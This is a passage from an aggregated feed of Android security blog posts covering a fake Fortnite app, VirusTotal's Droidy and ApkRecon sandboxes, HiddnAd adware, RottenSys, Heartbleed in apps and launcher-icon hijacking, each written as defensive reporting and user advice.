The next screen is where things go sideways. It requires a Mobile Verification.

Click “OK” and the app redirects to a website via your default browser. There, it claims to be for the purpose of verifying “You’r Not A BOT” (bad grammar and all) in order to proceed to Fortnite. To “verify,” the user must complete a task, which involves downloading another “free” app.

Click to view slideshow.

Click on a link and a pop-up promising “Unlock Instructions” appears.

Press “Tap to Install” and it redirects you to Google Play—that’s right, a bit of silver lining.  The redirect is at least to a legit, safe Google Play version of an app.

The bad news is that no matter how many apps you download, the game never unlocks—because it never existed within the malicious app in first place.

Yep, I know this game

The scheme goes like this: Get a couple of over-excited people salivating for a chance to play Fortnite on Android, and get paid. The more downloads that come from the website shown above, the more money the malware developers can make. With the app being so simplistic, the amount of development effort is pretty low for the amount that could be potentially gained. Hopefully, we can help stop the revenue stream by detecting this one as Android/Trojan.FakeFortnite.

Patience is a virtue

Every time there is craze around a new video game release, consequently we see malware authors jumping into the game. Often, it’s an attack against our good senses. They capitalize on that little itch that screams “I want it now!” We suggest listening to that other inner voice that warns, “This seems too good to be true.” Our advice: be patient. If you wait for the official release by Epic Games in the Google Play Store this summer, you won’t have the spend the ensuing months cleaning malware off your Android. Stay safe out there!

The post Fake Fortnite for Android links found on YouTube appeared first on Malwarebytes Labs.

Multisandbox project welcomes Cyber adAPT ApkRecon

Two weeks ago we announced the release of our new VirusTotal Droidy Android sandbox, a virtual environment that executes Android applications in an automated fashion in order to capture all the actions that the given app performs on the operating system.

Today we are excited to announce that Cyber adAPT is becoming a multisandbox project partner and will be contributing data from its ApkRecon product to the fight against malware. Like Droidy, its solution also focuses on the Android environment. In their own words:

ApkRecon is a sandbox environment developed by the research team at Cyber adAPT.  Amongst many features, the sandbox boasts a baited Android environment, a decrypted network application level capture, and an attack payload triggering system to gain insight into the true intent of each piece of analyzed malware. ApkRecon is also used to generate detection logic for Cyber adAPT’s Mobile Threat Detection product to keep users safe all around the world.

These are some example reports displaying the data contributed by Cyber adAPT:

It is worth highlighting the usefulness of this kind of data. When facing unknown files for which you have no context it can be very rich contextual information that allows analysts to have an initial judgement of the file before diving into dissecting it. For example, looking at the last example report above we notice that the file performs an HTTP POST to:


This is a URL that we can look up in VirusTotal Graph and jump to the host referenced in the URL, i.e. When exploring this host we notice that only the file under consideration has communicated with it, however, we do notice that expansions are available according to the referrer files relationship. This relationship pinpoints files that contain the given host within its body, even if they have not been seen communicating with it. Let’s follow this notion, something shady seems to be going on:

Badness is much easier to spot when studying the sample characterised in this other report:

In this case the APK reaches out to the URL:


From there we can jump to the domain entity, i.e., and expand URLs observed under such domain, as well as files communicating with it. Just two hops and we already have a preliminary idea about the initial APK that reached out to the aforementioned URL being malicious:

These examples highlight the importance of extracting as many attributes and behavioral details as possible from files, not only because they allow us to better understand a particular threat, but because they connect the dots and reveal entire campaigns. For instance, very often blocking a given network location will render ineffective all malware variants of a given campaign (inability to reach the mothership server), so even when certain variants fly under detection radars, there is still hope that network security measures will stop a given attack.

This kind of approach to block badness is something that we have shaped into a particular paper hosted in our space, more specifically the paper entitled VirusTotal Intelligence for banking trojans. In this paper malicious network infrastructure is shut down by contacting the pertinent domain registrars and hosting providers, however, organizations can also blacklist these locations in their network security controls.

Meet VirusTotal Droidy, our new Android sandbox

Recently we called out Additional crispinness on the MacOS box of apples sandbox, continuing with our effort to improve our malware behavior analysis infrastructure we are happy to announce the deployment of a new Android sandbox that replaces the existing system that was developed back in 2013.

This setup characterises the actions that Android APKs perform when installed and opened; it has been baptised as “VirusTotal Droidy”. Droidy has been integrated in the context of the multisandbox project and extracts juicy details such as:
  • Network communications and SMS-related activity. 
  • Java reflection calls. 
  • Filesystem interactions. 
  • SQLite database usage. 
  • Services started, stopped, etc. 
  • Permissions checked. 
  • Registered receivers. 
  • Crypto-related activity. 
  • Etc. 

You may find below a couple of reports showcasing this new functionality. Just select the “VirusTotal Droidy” entry in the multisandbox report selector (whenever there are multiple reports):

Don’t forget to also check the detailed report:

This advanced view allows you to dig into the hooked calls and take a look at the screenshots generated when running the apps:

The multisandbox project is in good shape, and now many samples have reports for multiple sandboxes. For instance, the following report allows you to see the output of Tencent HABO and VirusTotal Droidy:
As you can see, they are pretty complementary, proving the value of having different sandboxing technologies studying the same files.

To understand the extent to which this is an improvement with respect to the 2013 setup, you can take a look at the following report. It displays by default the output of the old sandbox. Use the selector to see the new report with VirusTotal Droidy:

Now, these may seem like minimal features to improve VirusTotal’s “microscope” capabilities for better understanding a particular threat. In fact, the changes go much deeper. All of our sandboxing information nurtures other services such as VirusTotal Intelligence and VirusTotal Graph. The richer the information that we generate for individual data set items, the greater the telescopic capabilities of VirusTotal. This is how we manage to fill in the dots and quickly see all activity tied to certain resources that often show up in malware investigations. For example, let us look at the graph of one of the domains seen in the previous reports:

At a glance you can understand that something shady is going on with and you are able to discover other malicious domains such as,,, etc. Some of these, for instance, are not only used as C2 infrastructure for malware but also serve as malware distribution points.

Very often during an investigation, you might not have enough context about an individual threat, and so being able to look at the connected URLs, domains, files, IP addresses, etc. becomes crucial in understanding what is going on. My colleague Evan explains this far better than I can do in just a couple of paragraphs, so make sure you check out his video dissecting a cryptomining attack at

Wrapping up, don’t think of this as just new functionality to dissect individual threats. All of this data contributes to the bigger picture and increases the power of our telescope lens that sheds light into malicious behaviors on the Internet.  

Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times

The amount we use our apps and the amount of apps we use has shown no signs of slowing. And as the McAfee Labs Threats Report: March 2018 tells us, mobile malware has shown no signs of slowing either. Now, a tricky Android malware dubbbed Andr/HiddnAd-AJ is adding to the plethora of mobile strains out there. The malware managed to sneak onto the Google Play Store disguised as seven different apps – which have collectively been downloaded over 500,000 times.

Slipping onto the Google Play store via six QR reader apps and one smart compass app, the malware manages to sneak past security checks through a combination of unique code and no initial malicious activity. Following installation, Andr/HiddnAd-AJ waits for six hours before it serves up adware. When it does, it floods a user’s screen with full-screen ads, opens ads on web pages, and sends various notifications containing ad-related links, all with the goal of generating click-based revenue for the attackers.

These apps have since been taken down by Google, however, it’s still crucial that Android users are on the lookout for Andr/HiddnAd-AJ malware and other adware schemes like it. Start by following these security tips:

  • Do your homework. Before you download an app, make sure you head to the reviews section of an app store first. Be sure to thoroughly sift through the reviews and read through the comments section; Andr/HiddnAd-AJ may have been avoided if a user read one of the comments and saw that the app was full of unnecessary advertisements. When in doubt, don’t download any app that is remotely questionable.
  • Limit the amount of apps. Only install apps you think you need and will use regularly. And if you no longer use an app, uninstall it. This will help you save memory and reduce your exposure to threats such as Andr/HiddnAd-AJ.
  • Don’t click. This may go without saying, but since this is a click-generated revenue scheme, do whatever you can to avoid clicking pop-ups and unwarranted advertisements. The less you click, the less cybercriminals will profit.
  • Use a mobile security solution. As malware and adware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times appeared first on McAfee Blogs.

McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards®

On February 28th, Info Security Products Guide Global Excellence Awards presented their 2018 award winners. We are humbled to have received two golds in the Product or Service Excellence of the Year — Security Information and Website & Web Application Security for McAfee Safe Connect.

Product Overview:

McAfee Safe Connect is a VPN (Virtual Private Network) that helps users create secure online connections while using the internet.  Doing so helps our customers minimize their individual security risks and helps keep their data private – especially when connecting to a public or open Wi-Fi network. Unlike home Wi-Fi, many public Wi-Fi networks (commonly offered at cafés, airports and hotels) aren’t password-protected and don’t encrypt the user data being transmitted through. Therefore, when you connect to a hotspot, your online activities from your social media activity to your online purchase history and even your bank account credentials may be wide open to hackers. With McAfee Safe Connect, you can rest assured that your information and online activities are encrypted.

McAfee has a proven record of providing security for consumers in the digital age. To address growing concerns over Wi-Fi security, we created an award-winning VPN that would keep users’ personal information secure from online threats and unsecure networks.

McAfee Safe Connect has over 1 million downloads across Google Play and the App Store with an impressive 4.3-star rating. It is available in over 20 languages to users worldwide.

Tech behemoth Samsung also chose McAfee Safe Connect VPN for their Galaxy Note 8 – Secure Wi-Fi feature and expanded collaboration with its newly announced Galaxy S9 Smartphones.

About Info Security PG’s Global Excellence Awards

Info Security Products Guide sponsors the Global Excellence Awards and plays a vital role in keeping individuals informed of the choices they can make when it comes to protecting their digital resources and assets. The guide is written expressly for those who wish to stay informed about recent security threats and the preventive measure they can take. You will discover a wealth of information in this guide including tomorrow’s technology today, best deployment scenarios, people and technologies shaping cyber security and industry predictions & directions that facilitate in making the most pertinent security decisions. Visit for the complete list of winners.

We are proud of recognition given to McAfee Safe Connect, which aims to safeguard every Internet user’s online privacy. Please check out our award-winning Wi-Fi Privacy VPN product: McAfee Safe Connect.

Interested in learning more about McAfee Safe Connect and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards® appeared first on McAfee Blogs.

RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone

China is a region that has been targeted with mobile malware for over a decade, as malware authors there are continually looking at different tactics to lure victims. One of the most innovative tactics that we have come across in the past several years is to get victims to buy discounted devices from sellers that have compromised a smartphone. And now, one of these campaigns, Android.MobilePay (aka dubbed RottenSys) is making headlines, though McAfee has been aware of it for over two years. The tactic used by the author(s)/distributors is straightforward; they install fake apps on a device that pretend to provide a critical function, but often don’t get used.

RottenSys is stealthy. It doesn’t provide any secure Wi-Fi related service but is rather an advanced strain of malware that swoops almost all sensitive Android permissions to enable its malicious activities. In order to avoid detection, RottenSys doesn’t come with an initial malicious component and or immediately initiate malicious activity. The strain has rather been designed to communicate with its command-and-control servers to obtain the actual malicious code in order to execute it and following which installs the malicious code onto the device.

Given it installs any new malicious components from its C&C server, RottenSys can be used to weaponize or take full control over millions of infected devices. In fact, it already seems that the hackers behind RottenSys have already started turning infected devices into a massive botnet network.

This attack acts as an indication of change, as over the past two years the mechanism of fraud has adapted. In the past, scams such as this typically have used premium SMS scams to generate revenue, which reach out to a premium number and make small charges that go unnoticed over the course of an extensive period. As described in detail in our Mobile Threat Report: March 2018, we have seen traditional attack vectors, such as premium text messages and toll fraud replaced by botnet ad fraud, pay-per-download distribution scams, and crypto mining malware that can generate millions in revenue.

Long story short – it’s important to still take precautionary steps to avoid future infection from this type of malware scheme. The good news is, you can easily check if your device is being infected with RottenSys. Go to Android system settings→ App Manager, and then look for the following possible malware package names:

  • android.yellowcalendarz
  • changmi.launcher
  • system.service.zdsgt

Beyond that, you can protect your device by following these tips:

  • Buy with security in mind. When looking to purchase your next mobile device, make sure to do a factory reset as soon as you turn it on for the first time.
  • Delete any unnecessary apps. Most mobile providers allow users to delete pre-installed apps. So, if there’s a pre-installed app you don’t use, or seems unknown to you, go ahead and remove it from your device entirely.
  • Always scan your device, even if it’s new. One of the first applications you should load onto a new device is an anti-malware scanner, like McAfee Mobile Security. It can detect and alert users to malicious behavior on their devices. In this case, if a malware variant is detected, new users can see if they can return their infected devices in exchange for a clean one.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone appeared first on McAfee Blogs.

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple did for a long time stubbornly deny security problems and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up the sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered but Microsoft gradually improved in security and built an efficient process for patching security holes. Microsoft had what is most important in security, the right attitude. Apple didn’t and the recent vulnerability study shows the result.

Here’s four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors are targeting them most. So the need for an anti-malware product is naturally bigger on these systems. But the so called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So changes are that you want a security product anyway even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux have sufficient security for a normal private user. But they will also all become unsafe if the security updates are neglected. So security is not really a selection criteria for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern systems architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonable safe. There are some differences though, but it is more about old-school versus new-school devices. Not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you never are 100% safe no matter what you do.


Safe surfing,


Added February 27th. Yes, this controversy study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represent a very limited view on security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally that this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.


If an Android Has a Heart, Does It Bleed?

The OpenSSL Heartbleed vulnerability “allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read” [1]. Heartbleed surprised the public by allowing attackers to steal sensitive information from vulnerable websites by sending crafted SSL heartbeat messages. However, due to the fact that servers can send heartbeats to clients as well, malicious servers can, in turn, attack vulnerable clients and steal sensitive information. For the Android platform, we find that roughly 150M downloads of Android apps contain OpenSSL libraries vulnerable to Heartbleed.

Currently there are about 17 antivirus apps on Google Play branded as “Heartbleed detectors”. Six of them scan the OpenSSL library belonging to the Android platform for vulnerabilities. Unfortunately, this method isn’t sufficient for detecting the Heartbleed vulnerability on Android. Except in limited Android versions (mainly 4.1.0-4.1.1), the majority of Android platforms are not vulnerable, as most versions use OpenSSL libraries that are not vulnerable or simply have the OpenSSL heartbeat functionality disabled.

However, Android apps frequently use native libraries, which either directly or indirectly leverage vulnerable OpenSSL libraries. Therefore, even though the Android platform itself is not vulnerable, attackers can still attack those vulnerable apps. They can hijack the network traffic, redirect the app to a malicious server and then send crafted heartbeats messages to the app to steal sensitive memory contents.

We studied apps with vulnerable OpenSSL libraries and confirmed this attack. Most of the vulnerable apps are games, and some are office-based applications. Although there is not much valuable information in the game apps, attackers can steal OAuth tokens (access tokens and refresh tokens) to hijack the game accounts; as such, the information might be useful for hijacking those linked social network accounts with incorrect configurations. Office apps vulnerable to Heartbleed are much more dangerous due to further potential data leakage.

During our investigation of the office apps that contains a vulnerable version of OpenSSL, we were surprised that they were not vulnerable to the Heartbleed attack. How could it be? A deeper look shows that these apps either make a mistake in the native code linkage, or just contain dead code. Therefore, when they try to invoke SSL functions, they directly use the non-vulnerable OpenSSL library contained within the Android OS, instead of using the vulnerable library provided by the app. The linkage mistake is common for Android applications built with native code. As such, the side-effect of this mistake helps reduce the apps’ overall risk profile.

Of the 17 Heartbleed detector apps on Google play, only 6 detectors check installed apps on the device for Heartbleed vulnerability. And of those 6, 2 report all apps installed as “Safe,” including those we confirmed as vulnerable. One detector doesn’t show any app scan results and another one doesn’t scan the OpenSSL version correctly. Only 2 of them did a decent check on Heartbleed vulnerability of apps. Although they conservatively labeled some non-vulnerable apps as vulnerable, we agree it is a viable report which highlights both the vulnerabilities and the linkage mistakes. We’ve also seen several fake Heartbleed detectors among the 17 apps, which only serve as adware and don’t perform real detections or display detection results to users.

On April 10th, we scanned more than 54K Google Play apps (each with over 100K downloads) and found that there were at least 220 million downloads affected by the Heartbleed vulnerability. We have notified some of the app developers and library vendors about the OpenSSL Heartbleed vulnerability found in their products. Fortunately, it seems most app developers and library vendors take Heartbleed seriously, as we have started to see apps updated with proper fixes. The total number of vulnerable apps download has since decreased to 150 million on April 17th.

[1] Vulnerability Summary for CVE-2014-0160

Occupy Your Icons Silently on Android

FireEye mobile security researchers have discovered a new Android security issue: a malicious app with normal protection level permissions can probe icons on Android home screen and modify them to point to phishing websites or the malicious app itself without notifying the user. Google has acknowledged this issue and released the patch to its OEM partners.

Normal vs. Dangerous Permissions: A Background

Android Open Source Project (AOSP) classifies Android permissions into several protection levels: “normal”, “dangerous”, “system”, “signature” and “development” [1][2][3].

Dangerous permissions “may be displayed to the user and require confirmation before proceeding, or some other approach may be taken to avoid the user automatically allowing the use of such facilities”. In contrast, normal permissions are automatically granted at installation,  “without asking for the user's explicit approval (though the user always has the option to review these permissions before installing)” [1].

On the latest Android 4.4.2 system, if an app requests both dangerous permissions and normal permissions, Android only displays the dangerous permissions, as shown in Figure 1. If an app requests only normal permissions, Android doesn’t display them to the user, as shown in Figure 2.

Figure 1. An Android app asks for one dangerous permission (INTERNET) and some normal permissions (Launcher’s READ_SETTINGS and WRITE_SETTINGS). Android doesn’t notify the user about the normal permissions.

Figure 2. An Android app asks for normal permissions (Launcher’s READ_SETTINGS and WRITE_SETTINGS) only. Android doesn’t show any permission to the user.

Normal Permissions Can Be Dangerous

We have found that certain “normal” permissions have dangerous security impacts. Using these normal permissions, a malicious app can replace legit Android home screen icons with fake ones that point to phishing apps or websites.

The ability to manipulate Android home screen icons, when abused, can help an attacker deceive the user. There’s no surprise that the permission, which allows an app to create icons, was recategorized from “normal” to “dangerous” ever since Android 4.2. Though this is an important security improvement, an attacker can still manipulate Android home screen icons using two normal permissions: and These two permissions enable an app to query, insert, delete, or modify the whole configuration settings of the Launcher, including the icon insertion or modification. Unfortunately, these two permissions have been labeled as “normal” since Android 1.x.

As a proof of concept attack scenario, a malicious app with these two permissions can query/insert/alter the system icon settings and modify legitimate icons of some security-sensitive apps, such as banking apps, to a phishing website. We tested and confirmed this attack on a Nexus 7 device with Android 4.4.2. (Note: The testing website was brought down quickly and nobody else ever connected to it.) Google Play doesn’t prevent this app from being published and there’s no warning when a user downloads and installs it. (Note: We have removed the app from Google Play quickly and nobody else downloaded this app.)

Lastly, this vulnerability is not limited to Android devices running AOSP. We have also examined devices that use non-AOSP Launchers, including Nexus 7 with CyanogenMod 4.4.2, Samsung Galaxy S4 with Android 4.3 and HTC One with Android 4.4.2. All of them have the protection levels of and WRITE_SETTINGS as “normal”.

Google acknowledged this vulnerability and has released the patch to its OEM partners. Many android vendors were slow to adapt security upgrades. We urge these vendors to patch vulnerabilities more quickly to protect their users.